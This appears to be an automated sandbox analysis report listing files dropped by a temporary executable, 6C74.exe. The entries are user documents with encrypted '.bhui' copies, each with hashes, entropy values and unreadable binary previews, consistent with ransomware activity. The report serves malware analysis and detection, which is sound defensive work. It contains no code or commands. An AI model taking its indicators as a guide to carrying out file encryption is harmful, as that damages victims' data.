Tn....P.)FQc5.....".O..!..%....s.-+z...S..MV}..5.v(6.....(%k..a.M[...q......L{....p0..,H......Fs.C].]......k.!(..r.m.mj....Hj..3DQ~.e./w..).r...>-.G.t....Tl<:@[.....I.../....Px..z4........G....)D.....5..\|;.`..;....e.-..*..~..n..T

C:\Users\user\Documents\NWCXBPIUYI\HQJBRDYKDE.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859357196635572
Encrypted:	false
SSDEEP:	24:Se6Sh01ZK90jKDIi7ZdDBbD7ymgaStMyeGlc7XEqAbVfCift2n0CSOsWs1vWbD:JuZO0jKBBbDyT3lEtAbVpft2rJZD
MD5:	15A82F7AC3DB62051691F1F8D61228C6
SHA1:	95EE47BE55A52CF8156E7B1CFACE28DF7BB21C14
SHA-256:	5C33D7AF4E61F3E0CEA9C792387005741D2D0EAB01C6C71DBFFD1A8A2C15C183
SHA-512:	5CC4630B1EF42B94BD15F09F8C5CE93DDF60FDDFD285BA1955F381141AF366298782327C95A7A1C7B86523972BBA59444BA4351C0C82D4520901C4A0E90AF655
Malicious:	false
Reputation:	unknown
Preview:	HQJBR.@.9\|....!`..0{..V.>..:..c.v'..v]Z.k..z..ofX..YL;........C.V.J..hp]h......._..~K.t..A+D.~kw.....o...^...93.>&.Ym".i.....T.N...,.n..d.3....]?.....3.7.A.?.R...i.~...\|....Z..._...i..!..fz.9.c.j.8....z`....e.p.~....$.]u.,:.....7."J........?..dD...r.5.......{.......O.lE]...7JH.m....Y^..;.A..M........Y@..<.:P_.=...9....`.>u}...\.Q.'...'>...J+..3..+Q....6..:=5.....mu.?+.i..d..w. ....<=/."Tc,.....?v...)....{....0.77...&O..BJ.3.P.Z..pWBkZ.7,.......G....}R....u0.J=..%[v7#Ll........9..j..v.2..8:T.....T.F.n.....z"..d90s......g..'..C>......y..h.J.T'..D....h...........B..O..Dj,..,U.n.G+.V..9..\|;..1.I.ds..r....i[-+...W...T.;......o.U..S.&H..?.I..pr..kJ=.'S_.j.7.`d.e.Y...&.T`.8........^yc..H.....B..=..WQ..%.R..7A..._ Tn....P.)FQc5.....".O..!..%....s.-+z...S..MV}..5.v(6.....(%k..a.M[...q......L{....p0..,H......Fs.C].]......k.!(..r.m.mj....Hj..3DQ~.e./w..).r...>-.G.t....Tl<:@[.....I.../....Px..z4........G....)D.....5..\|;.`..;....e.-..*..~..n..T

C:\Users\user\Documents\NWCXBPIUYI\LFOPODGVOH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830088308325112
Encrypted:	false
SSDEEP:	24:2Aszvj4zX65I+xTtllGntlHnSmxgWVkY4ivQvNUeCf6WlQ3mLfLhseYdSeWbD:bsz2K5tvlol4CqrfWlhVseYdSLD
MD5:	54E8E40720124F47C776BACAEB1AF296
SHA1:	56155A34BD93909C77AA0D16D9F7C709B1CF5B09
SHA-256:	A4BF8045AC1560C270F50939AA620905A28C241F4006BD83CE08A8FE981AAED9
SHA-512:	902CBFF32DEAEF4A3E7B29F5F95CDD9C02DEC816B94E94AEDC20F388565BFD9052AF7E62A1B2F9912FFEB7FB552A565FEBDCC5B60B0C66BF48C140B23531A23C
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.....}.K.,Tc.6.....+..VB.T..3..8..v..t.1..H....p.T.......\..L.t.......Mi.r/M.1....L.........8..1..Mkn..%..\.WU...i.r...((.\...k,}.B..n.Ok....h..!..(hRK...b.v...Uv...g..P..dI.&..L..,..A(Qax.\|/..........(..=....@A.]M..1.......;2.....t.e.U.}&.~R.HyL.UQ,....K]..W.9m,b..b{FM".p..b...g.. ......."F.a.wte[ i..m..]=.r.fJ...FM\._......e........<@.l/d5.......,..:..C...[..V....."w.....\|....).&..~.N;._LF....R>.$....1..k.2$.Al....@........&....y4..eN.h..`5lZ.6d_........z..To.......s1^.6..+.q.......M.b..E0KX.q.....i3...2....).(V....Xa...:.'.w.C..)..b.V.f[..i.T....$~[. ...lf.7...K ..U.7.=...yF..k...^.....'.-g...K....\|6n.J......~...Q/. ..-..+..(.Z.6'2..A.ea(.f.&..7..f.-..s...^w.. .....#..7wAQF...C...t.....e.{....#BG.........H9...Izi.4..^).,..Q.4.J......w.....`&,c>..E..nM8.....Q4.....B.....sc.@.U.i..@......V...b...OL..z..%a.~....-D.p.%.......)...C../..3........7._L..D....)}..Z..B.%.T6....^....w.R...jQ!,s.d..$.f[.. x..t....9.......Jf..i.../$7....t...S.].]^..

C:\Users\user\Documents\NWCXBPIUYI\LFOPODGVOH.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830088308325112
Encrypted:	false
SSDEEP:	24:2Aszvj4zX65I+xTtllGntlHnSmxgWVkY4ivQvNUeCf6WlQ3mLfLhseYdSeWbD:bsz2K5tvlol4CqrfWlhVseYdSLD
MD5:	54E8E40720124F47C776BACAEB1AF296
SHA1:	56155A34BD93909C77AA0D16D9F7C709B1CF5B09
SHA-256:	A4BF8045AC1560C270F50939AA620905A28C241F4006BD83CE08A8FE981AAED9
SHA-512:	902CBFF32DEAEF4A3E7B29F5F95CDD9C02DEC816B94E94AEDC20F388565BFD9052AF7E62A1B2F9912FFEB7FB552A565FEBDCC5B60B0C66BF48C140B23531A23C
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.....}.K.,Tc.6.....+..VB.T..3..8..v..t.1..H....p.T.......\..L.t.......Mi.r/M.1....L.........8..1..Mkn..%..\.WU...i.r...((.\...k,}.B..n.Ok....h..!..(hRK...b.v...Uv...g..P..dI.&..L..,..A(Qax.\|/..........(..=....@A.]M..1.......;2.....t.e.U.}&.~R.HyL.UQ,....K]..W.9m,b..b{FM".p..b...g.. ......."F.a.wte[ i..m..]=.r.fJ...FM\._......e........<@.l/d5.......,..:..C...[..V....."w.....\|....).&..~.N;._LF....R>.$....1..k.2$.Al....@........&....y4..eN.h..`5lZ.6d_........z..To.......s1^.6..+.q.......M.b..E0KX.q.....i3...2....).(V....Xa...:.'.w.C..)..b.V.f[..i.T....$~[. ...lf.7...K ..U.7.=...yF..k...^.....'.-g...K....\|6n.J......~...Q/. ..-..+..(.Z.6'2..A.ea(.f.&..7..f.-..s...^w.. .....#..7wAQF...C...t.....e.{....#BG.........H9...Izi.4..^).,..Q.4.J......w.....`&,c>..E..nM8.....Q4.....B.....sc.@.U.i..@......V...b...OL..z..%a.~....-D.p.%.......)...C../..3........7._L..D....)}..Z..B.%.T6....^....w.R...jQ!,s.d..$.f[.. x..t....9.......Jf..i.../$7....t...S.].]^..

C:\Users\user\Documents\NWCXBPIUYI\NIRMEKAMZH.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841886233556976
Encrypted:	false
SSDEEP:	24:Dz0hbp7t5psKuBDEkgW+7A30qJDPiP6qTKGYt7PeMP0kXR1LO2HfCvhjyvXEJAyc:87phEDEXqJ7iCqb+xXfJKYvXEJAlD
MD5:	CB30381171029028A06A52A79D922E5E
SHA1:	E06867248634FD7F5B9571CA4BBC2DC6F251CAF8
SHA-256:	1BA2F4FCB9E9F7E57E9EA208F3623B93EBB7DA0D3E0B3E6E9B7186F702883C09
SHA-512:	4B014874BD5CD848B8E05AA04D5BEA2BA0582DBE1D00A0C0CA41B8E91C4619C460E5FFA355C45963632939ECC1F0AB82C0B9865BCDC66D1FDC3269CCE7943046
Malicious:	false
Reputation:	unknown
Preview:	NIRME..E...\...Y=..?....../'......\|....@...Q._E6q.....$.....rm....F.......\|~....7..~..GKMV....IQQ{..`.l-.......cy.0).J0......B.......]. gn.o....q.yN...r..........X9.x........_...R<.&0..I<]M!.z..'h.z ..>.\.L..l...B....P1....rE~...#..._N.Z,";..S.m#.J..`+i...Cc.....J.....'....D(..R....5)}..8....E`P..%?..pG/.'n..s...C..w}/.....7`.d.1y....-..3%.z.u..z.[..N.......V..n..F......b.....(....f,....'.%..U.9K....../Q..5.r..d.-.Cr....,.#...4..]...........f9G\|...$.5....S.3#..3C:.J!m......w...C.........tp...%.Q.....M.P.........).8...[..p....7x....3..../-x.=f.rD].l...u.V.... .~.0'._y.=2..Y;JU.....9.......8...]3.(`\...C.8n..P.v..f.q..X$..nq...!.....\|..]....C..[.Y.." .....o..V}N.+....<t...6...&k.....#...~.>..`..=...t.5...ctU..K,..-..+i.~....6....X8.,w]b.$.I..-...Fe6H~o.....N(w..i\|.n..#.>n/./.P............2:.y&..eI.Q1..nV......{M......J...&e.vh........m_P.6Z..;....~.TU......\|...>_D.C..%.w'...a..>.p%'.].G.UB....5.n.........*.:n`...hlD..y.["..>...M.S.

C:\Users\user\Documents\NWCXBPIUYI\NIRMEKAMZH.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.841886233556976
Encrypted:	false
SSDEEP:	24:Dz0hbp7t5psKuBDEkgW+7A30qJDPiP6qTKGYt7PeMP0kXR1LO2HfCvhjyvXEJAyc:87phEDEXqJ7iCqb+xXfJKYvXEJAlD
MD5:	CB30381171029028A06A52A79D922E5E
SHA1:	E06867248634FD7F5B9571CA4BBC2DC6F251CAF8
SHA-256:	1BA2F4FCB9E9F7E57E9EA208F3623B93EBB7DA0D3E0B3E6E9B7186F702883C09
SHA-512:	4B014874BD5CD848B8E05AA04D5BEA2BA0582DBE1D00A0C0CA41B8E91C4619C460E5FFA355C45963632939ECC1F0AB82C0B9865BCDC66D1FDC3269CCE7943046
Malicious:	false
Reputation:	unknown
Preview:	NIRME..E...\...Y=..?....../'......\|....@...Q._E6q.....$.....rm....F.......\|~....7..~..GKMV....IQQ{..`.l-.......cy.0).J0......B.......]. gn.o....q.yN...r..........X9.x........_...R<.&0..I<]M!.z..'h.z ..>.\.L..l...B....P1....rE~...#..._N.Z,";..S.m#.J..`+i...Cc.....J.....'....D(..R....5)}..8....E`P..%?..pG/.'n..s...C..w}/.....7`.d.1y....-..3%.z.u..z.[..N.......V..n..F......b.....(....f,....'.%..U.9K....../Q..5.r..d.-.Cr....,.#...4..]...........f9G\|...$.5....S.3#..3C:.J!m......w...C.........tp...%.Q.....M.P.........).8...[..p....7x....3..../-x.=f.rD].l...u.V.... .~.0'._y.=2..Y;JU.....9.......8...]3.(`\...C.8n..P.v..f.q..X$..nq...!.....\|..]....C..[.Y.." .....o..V}N.+....<t...6...&k.....#...~.>..`..=...t.5...ctU..K,..-..+i.~....6....X8.,w]b.$.I..-...Fe6H~o.....N(w..i\|.n..#.>n/./.P............2:.y&..eI.Q1..nV......{M......J...&e.vh........m_P.6Z..;....~.TU......\|...>_D.C..%.w'...a..>.p%'.].G.UB....5.n.........*.:n`...hlD..y.["..>...M.S.

C:\Users\user\Documents\NWCXBPIUYI\NWCXBPIUYI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868221342840488
Encrypted:	false
SSDEEP:	24:kyvxARrQ9xmUyz4jSdGy7RTUNUNSpqHPloTqlyN0ql70FRRTwKccWbD:36rQ/mHaS0yVXCqvloTq2j7GjaD
MD5:	C612C0DA4189998D29E4DD016EE66CBF
SHA1:	CB11DEB5F62BEBD7E52AF25C9B1BFCAC22BB34BA
SHA-256:	CCF23DE7D8F19AB75E5C5B464CFB24E42ABB8B6B770B97FF62A20728F1FCB3B7
SHA-512:	29AE24E1047AA561FCC95B24C203964F1FA7B95B018DF17CB645568633E6C24ADA0D6AB7CB03DB2E248CCC23C9EEA5484A1C79955AD8D16C9E4A4EDED471FB0C
Malicious:	false
Reputation:	unknown
Preview:	NWCXB'..-=.tM.l:..C.Gog.Z..Pa.V..Tn.;.Z..Tn5.sN....>k....e.......)....F.y..7....8...-...Uz..D.;Q.,D.u>M.#'.Q..5.L.Y..H.& .7.x~......k...N..:7.I...e._G...oN.\.%.... .w#E..!X.E. .O..e....g}.q..:..[.O......@}_.&.j..1../.f....5..,......x.j.uZ...Z....W..o....r. .+...1.YE..@.2...Y...B.x..#}.\|.[L.1.1.W..[$;...g.d.R...%.}........J........Y.[...gQ\..Du........J..V..f......;..\(Z..9...l.^....=....,._..."...h..rX.~.h9.......pvb%.....K..;zM.....W.;v.J.^.......V..J......D.^F}.5A..`5y.....~.+..;.O.Pv\1..'.)..$4...I....=.T.1Pqu....r..d...gI...qN..%......`.]..<U\|.v..d.h5..b.EzTm`.....#.......kZ-.9[..m...~....BE...hm7....3..5z.d..7O.....W.!...~..n.....[.......]..qiR;...RL...lu......?.=.&...........Qj.4.`.....N.@t...k.Y.NLe.....\....7.3b..]....p...&.5.I.t<3...e".......2..l......zbP...(...;....U..:..Fw`W].....&.H.\|..b......(.n.L..w=U..L.?.U.?..2...h.."...".Z..v..T..M,.....Ke.mc..j..Z6.l.S....1..9./j.*..R.)h....O1..3.6..C.fKk.5....a.....D.6EV....V.).......n.m

C:\Users\user\Documents\NWCXBPIUYI\NWCXBPIUYI.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.868221342840488
Encrypted:	false
SSDEEP:	24:kyvxARrQ9xmUyz4jSdGy7RTUNUNSpqHPloTqlyN0ql70FRRTwKccWbD:36rQ/mHaS0yVXCqvloTq2j7GjaD
MD5:	C612C0DA4189998D29E4DD016EE66CBF
SHA1:	CB11DEB5F62BEBD7E52AF25C9B1BFCAC22BB34BA
SHA-256:	CCF23DE7D8F19AB75E5C5B464CFB24E42ABB8B6B770B97FF62A20728F1FCB3B7
SHA-512:	29AE24E1047AA561FCC95B24C203964F1FA7B95B018DF17CB645568633E6C24ADA0D6AB7CB03DB2E248CCC23C9EEA5484A1C79955AD8D16C9E4A4EDED471FB0C
Malicious:	false
Reputation:	unknown
Preview:	NWCXB'..-=.tM.l:..C.Gog.Z..Pa.V..Tn.;.Z..Tn5.sN....>k....e.......)....F.y..7....8...-...Uz..D.;Q.,D.u>M.#'.Q..5.L.Y..H.& .7.x~......k...N..:7.I...e._G...oN.\.%.... .w#E..!X.E. .O..e....g}.q..:..[.O......@}_.&.j..1../.f....5..,......x.j.uZ...Z....W..o....r. .+...1.YE..@.2...Y...B.x..#}.\|.[L.1.1.W..[$;...g.d.R...%.}........J........Y.[...gQ\..Du........J..V..f......;..\(Z..9...l.^....=....,._..."...h..rX.~.h9.......pvb%.....K..;zM.....W.;v.J.^.......V..J......D.^F}.5A..`5y.....~.+..;.O.Pv\1..'.)..$4...I....=.T.1Pqu....r..d...gI...qN..%......`.]..<U\|.v..d.h5..b.EzTm`.....#.......kZ-.9[..m...~....BE...hm7....3..5z.d..7O.....W.!...~..n.....[.......]..qiR;...RL...lu......?.=.&...........Qj.4.`.....N.@t...k.Y.NLe.....\....7.3b..]....p...&.5.I.t<3...e".......2..l......zbP...(...;....U..:..Fw`W].....&.H.\|..b......(.n.L..w=U..L.?.U.?..2...h.."...".Z..v..T..M,.....Ke.mc..j..Z6.l.S....1..9./j.*..R.)h....O1..3.6..C.fKk.5....a.....D.6EV....V.).......n.m

C:\Users\user\Documents\NWCXBPIUYI\VWDFPKGDUF.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854203651861278
Encrypted:	false
SSDEEP:	24:NtpczAtTOLmzobFOHUTvDwlCdJwpkG51bvJifJ0qgQLNEzUV9yrZBUOrsggR3WbD:Ntp7tTOL1FCywOmk0pqR7qDHrsgSUD
MD5:	731AAFED40DAAADE89EC59771FC362D2
SHA1:	D9FF852E1780A668309466F6BB95B1F6B5D8C7AF
SHA-256:	BFDD975627FFE422E33F04156B4C403DD0AEA578DCB093067156ECCBD937437F
SHA-512:	69F7395CCBBBFFC0A61AC6FB5234E436161F09FE85BBB0ACF9C59D0C5EA9794E7F7E633A13B6D101AD453CFA57C072B65CF302DD078EEFBE6730D176263109F9
Malicious:	false
Reputation:	unknown
Preview:	VWDFPX......J.lO..5..`* ..{i.Bm...uM~\|$..;....q...M...A'.......Z.<....e...........X.<.0D..IG.d.m..`>.S..g.x)......]....d..2"....H>"f0..J...n.{.....cn.R,...u..I..O..J.c:F..0..h}S..9DX..".7.....QV.....:b......3U...e2.U.....?...i.v..5..Nw...1j.O,VT............. .....u_....(..\.jO..9S..y$..zN.1n...S%..DF.Q.-..N.n........%.F.?.]mAC.ej.....=.t...{..[.%....-.v..............8]......H.q_.r........H..P..q....Q..$.v....o...1...8..{..8.....,..~..#./.(..}.....h0.:d.V`FwF.z..P.Py&...7.S...3>.`.p.+1..(....l.1:f!i.&.p...l1q]m.K.r.....,V..).1u.:M..(....j........d............m......A.."..d...b.s...&....L...M....>A.......V.h..;.r...}......5.(.....Y.8.E..j.x......X.....%.w.9.5.^......aTif.\|..B...3..+j=.]....M..~=.3.)..D.7...NL.1...,.v.E...M.33^J~.}....8.?...>w.n<N.-..d.r~.3..0...t..<.ic....+...;O....`...'...XI......L.Eu".5.m.a..>.W...@..k.a.k..v;^.'...;....k.[..R...>.E.>..UE.<.l.b..x.:... !...8\|b57@QB`U9.....1m3..F._Qg_W.?.B_........q.^...~.1#..Mht.9mm...G.#."..G

C:\Users\user\Documents\NWCXBPIUYI\VWDFPKGDUF.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854203651861278
Encrypted:	false
SSDEEP:	24:NtpczAtTOLmzobFOHUTvDwlCdJwpkG51bvJifJ0qgQLNEzUV9yrZBUOrsggR3WbD:Ntp7tTOL1FCywOmk0pqR7qDHrsgSUD
MD5:	731AAFED40DAAADE89EC59771FC362D2
SHA1:	D9FF852E1780A668309466F6BB95B1F6B5D8C7AF
SHA-256:	BFDD975627FFE422E33F04156B4C403DD0AEA578DCB093067156ECCBD937437F
SHA-512:	69F7395CCBBBFFC0A61AC6FB5234E436161F09FE85BBB0ACF9C59D0C5EA9794E7F7E633A13B6D101AD453CFA57C072B65CF302DD078EEFBE6730D176263109F9
Malicious:	false
Reputation:	unknown
Preview:	VWDFPX......J.lO..5..`* ..{i.Bm...uM~\|$..;....q...M...A'.......Z.<....e...........X.<.0D..IG.d.m..`>.S..g.x)......]....d..2"....H>"f0..J...n.{.....cn.R,...u..I..O..J.c:F..0..h}S..9DX..".7.....QV.....:b......3U...e2.U.....?...i.v..5..Nw...1j.O,VT............. .....u_....(..\.jO..9S..y$..zN.1n...S%..DF.Q.-..N.n........%.F.?.]mAC.ej.....=.t...{..[.%....-.v..............8]......H.q_.r........H..P..q....Q..$.v....o...1...8..{..8.....,..~..#./.(..}.....h0.:d.V`FwF.z..P.Py&...7.S...3>.`.p.+1..(....l.1:f!i.&.p...l1q]m.K.r.....,V..).1u.:M..(....j........d............m......A.."..d...b.s...&....L...M....>A.......V.h..;.r...}......5.(.....Y.8.E..j.x......X.....%.w.9.5.^......aTif.\|..B...3..+j=.]....M..~=.3.)..D.7...NL.1...,.v.E...M.33^J~.}....8.?...>w.n<N.-..d.r~.3..0...t..<.ic....+...;O....`...'...XI......L.Eu".5.m.a..>.W...@..k.a.k..v;^.'...;....k.[..R...>.E.>..UE.<.l.b..x.:... !...8\|b57@QB`U9.....1m3..F._Qg_W.?.B_........q.^...~.1#..Mht.9mm...G.#."..G

C:\Users\user\Documents\NYMMPCEIMA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838441601970234
Encrypted:	false
SSDEEP:	24:m9Z7m6vyNh/m6bSyklygAR3Zv3Agpq4wPuE0k2XGcsOZXbTE4+DysN5E8bF3hqv9:+UV/xzkfAR3Zv3AgkXeXZsOZs4+Wsrt8
MD5:	E33E3FB8BAA3A44480A16F072BA842D4
SHA1:	0781A6FBB55954A4077A27B5CAE713CF73253288
SHA-256:	1E356A58848945E494D48C67A32605951ADD92D47C22D7A8CC7E0D60BB363090
SHA-512:	C1D459993D6E7C41B77BB7831629CAF066DA72BA33CA43B2A5288A2C252B6712349924C05EF2C0EE7500E9972612809F31BA12E63C33A58D2295A5B2C171A1D7
Malicious:	false
Reputation:	unknown
Preview:	NYMMP<X.J.....\|j2&TIHQe..e.`..X7f.L...H..U.x....h..@..........Nmj..y(........O.Z...8..C.....ou.....U..n.=.8.....m.E..x..K..y\.".@^G.....R.r..nGb\|j....P.....^......o.qA5...B..:M...fYDyg.@0~..e%:{...MJ...;..e...n.....&...8e..o.f......xu.....HS=4..Q.@.. .Ut.......0s..y.........l....T...#...d1..`.....I.7...n;R...N.c(C.W..<...s...x.pw...y.t..<F..W6.CFY.QX.V.BV...2.r. ......8.+.+.h.t.......a.q.t....,.u2Vh..m..f=n..KR^.1...Xe.T..).....H...".Bpe<iE+.(....?..1,.!..@...-...]{....M.y.O.oe.?.6.a...i@...@c....p..[.......).-N.KI(.......y..(.b.[..W.f..c.<r...(.....H.....I.....A6;(..6.e.....J.......h.-Yz..(..>.!.cj.F.j...J....D-.)?.......s.\|.Rbo.......E.7y.%....FO.D.O.tF.M.6.m<.........!w.\|/....NV....i9.S.j.D.....-.q.O.X#Qx....>._...^q..Lr+6R.....M?.Y........Tq.~v........{".... .3.(x.N.....[4+PC@.o.kBp7E..J.+D.../(=F.....E......x..i.zd...gtMd..U...a.X.y.1..\|..F....MpCK.....%..n..`@...........W..y...o..R.[.:..u....`u.j..Z.........1E....J...{......?...q;.

C:\Users\user\Documents\NYMMPCEIMA.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.838441601970234
Encrypted:	false
SSDEEP:	24:m9Z7m6vyNh/m6bSyklygAR3Zv3Agpq4wPuE0k2XGcsOZXbTE4+DysN5E8bF3hqv9:+UV/xzkfAR3Zv3AgkXeXZsOZs4+Wsrt8
MD5:	E33E3FB8BAA3A44480A16F072BA842D4
SHA1:	0781A6FBB55954A4077A27B5CAE713CF73253288
SHA-256:	1E356A58848945E494D48C67A32605951ADD92D47C22D7A8CC7E0D60BB363090
SHA-512:	C1D459993D6E7C41B77BB7831629CAF066DA72BA33CA43B2A5288A2C252B6712349924C05EF2C0EE7500E9972612809F31BA12E63C33A58D2295A5B2C171A1D7
Malicious:	false
Reputation:	unknown
Preview:	NYMMP<X.J.....\|j2&TIHQe..e.`..X7f.L...H..U.x....h..@..........Nmj..y(........O.Z...8..C.....ou.....U..n.=.8.....m.E..x..K..y\.".@^G.....R.r..nGb\|j....P.....^......o.qA5...B..:M...fYDyg.@0~..e%:{...MJ...;..e...n.....&...8e..o.f......xu.....HS=4..Q.@.. .Ut.......0s..y.........l....T...#...d1..`.....I.7...n;R...N.c(C.W..<...s...x.pw...y.t..<F..W6.CFY.QX.V.BV...2.r. ......8.+.+.h.t.......a.q.t....,.u2Vh..m..f=n..KR^.1...Xe.T..).....H...".Bpe<iE+.(....?..1,.!..@...-...]{....M.y.O.oe.?.6.a...i@...@c....p..[.......).-N.KI(.......y..(.b.[..W.f..c.<r...(.....H.....I.....A6;(..6.e.....J.......h.-Yz..(..>.!.cj.F.j...J....D-.)?.......s.\|.Rbo.......E.7y.%....FO.D.O.tF.M.6.m<.........!w.\|/....NV....i9.S.j.D.....-.q.O.X#Qx....>._...^q..Lr+6R.....M?.Y........Tq.~v........{".... .3.(x.N.....[4+PC@.o.kBp7E..J.+D.../(=F.....E......x..i.zd...gtMd..U...a.X.y.1..\|..F....MpCK.....%..n..`@...........W..y...o..R.[.:..u....`u.j..Z.........1E....J...{......?...q;.

C:\Users\user\Documents\NYMMPCEIMA.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865026426157912
Encrypted:	false
SSDEEP:	24:gymIf/6eLLjxDs5xcC4rnBDJG+2+KMZ+mkEJyxOXgVEOWbD:gnIn5LxDWivlx2+5kkTZD
MD5:	A7C1BEA81E926782AD1731E0327EE896
SHA1:	52512C529BA84E4D70145958E8477E63BABE176D
SHA-256:	600D4EB2B06824622727613764D85C1AC365934AE85877D647E652FD32FFFBC6
SHA-512:	4D57A8C2741177C1FB44AC9D37CFDD102FD15F5451B80163A2C42CD3C881C3D6226300690B1D35E3ED94D8AA4E8AF4FC85940C3E19CC3AB81B638AD1C12B5C0F
Malicious:	false
Reputation:	unknown
Preview:	NYMMP.\|..w.{..g.v.:.}Q...R..GS.N.a..F.0r....u..6WH..N..Rd.!R.Hz..D..+..Gm...p..ro.b...42..}N......3.P.p....3.\|`.....J..h...c.........f.'.1.=K..%.-....A.......q.{Pn.r...!.B.\.pW.Ub-".....av/"..>a.....(....r...y.};....P.........=..w.>b9......TA..mq.\|sX...........$...5t]....~p.\J...6t.G`q...K\|.r.ZhL...%...~..~.Ce.....d..I...nj.5.L...........?.3....H........O.~...wV._ .n.....7.x..F.U..[y....."V85....,...NK........sU..t.cK=N............g.7....]p...(-...o..rb.7\."5..s!.S.}M....e\|....S......R..=.5..i......\.N..1.........f..)....e....T........XE..,.f..q..w......q"...5W ..Rg....."...>...q......a.^2.......Q.I.Q.}..Xw.._....D...z5..S........#.....'.b.$..)..jx..V....Xw.#F..3.....I.wH..<f......$.B6..f\|....>.dp.a.l.,..{....G..6. .().i.h....-w....C..[.ts..k.D....7`....=..=....1>ELF.(V..vs.j.[Y......i.W.Nn..v....lQ...[.q....9S3...E.#t.....J{..]s...2.W.%.....5&.`t...a/L....,k.&5..&....Q..@Z..K..fo>....Po.]..e..../..!<s..Bc4N.y.WW.

C:\Users\user\Documents\NYMMPCEIMA.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.865026426157912
Encrypted:	false
SSDEEP:	24:gymIf/6eLLjxDs5xcC4rnBDJG+2+KMZ+mkEJyxOXgVEOWbD:gnIn5LxDWivlx2+5kkTZD
MD5:	A7C1BEA81E926782AD1731E0327EE896
SHA1:	52512C529BA84E4D70145958E8477E63BABE176D
SHA-256:	600D4EB2B06824622727613764D85C1AC365934AE85877D647E652FD32FFFBC6
SHA-512:	4D57A8C2741177C1FB44AC9D37CFDD102FD15F5451B80163A2C42CD3C881C3D6226300690B1D35E3ED94D8AA4E8AF4FC85940C3E19CC3AB81B638AD1C12B5C0F
Malicious:	false
Reputation:	unknown
Preview:	NYMMP.\|..w.{..g.v.:.}Q...R..GS.N.a..F.0r....u..6WH..N..Rd.!R.Hz..D..+..Gm...p..ro.b...42..}N......3.P.p....3.\|`.....J..h...c.........f.'.1.=K..%.-....A.......q.{Pn.r...!.B.\.pW.Ub-".....av/"..>a.....(....r...y.};....P.........=..w.>b9......TA..mq.\|sX...........$...5t]....~p.\J...6t.G`q...K\|.r.ZhL...%...~..~.Ce.....d..I...nj.5.L...........?.3....H........O.~...wV._ .n.....7.x..F.U..[y....."V85....,...NK........sU..t.cK=N............g.7....]p...(-...o..rb.7\."5..s!.S.}M....e\|....S......R..=.5..i......\.N..1.........f..)....e....T........XE..,.f..q..w......q"...5W ..Rg....."...>...q......a.^2.......Q.I.Q.}..Xw.._....D...z5..S........#.....'.b.$..)..jx..V....Xw.#F..3.....I.wH..<f......$.B6..f\|....>.dp.a.l.,..{....G..6. .().i.h....-w....C..[.ts..k.D....7`....=..=....1>ELF.(V..vs.j.[Y......i.W.Nn..v....lQ...[.q....9S3...E.#t.....J{..]s...2.W.%.....5&.`t...a/L....,k.&5..&....Q..@Z..K..fo>....Po.]..e..../..!<s..Bc4N.y.WW.

C:\Users\user\Documents\NYMMPCEIMA\GLTYDMDUST.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8483939021032825
Encrypted:	false
SSDEEP:	24:fvPhN5VXqf5GofhR/8zrxktVFVjNHO7amRuIftmMacSYvoPYJr5jU1gp/Ok7xSWX:3LfX05GChqzV+j/GtmrcSI5jQOF7xPD
MD5:	E77889B26BC5AE7AEBFB66B42EA5E1A1
SHA1:	BFB77B5003130CA5128F6FBF5E5A72B3BFBF5673
SHA-256:	40F21E16BA9D581E1D3F868D2DF7EA8184FE677F4CB176E2988B814B8807CAFB
SHA-512:	7197615BE69DB93B48D61BBDB5DEEB79D11649DD7F105426F0FF61AE2175A563F275DFC9EC1DAEAB8F0E97D2EE07208C35F08F65BCAF7746F5D4F0D280DEC6B7
Malicious:	false
Reputation:	unknown
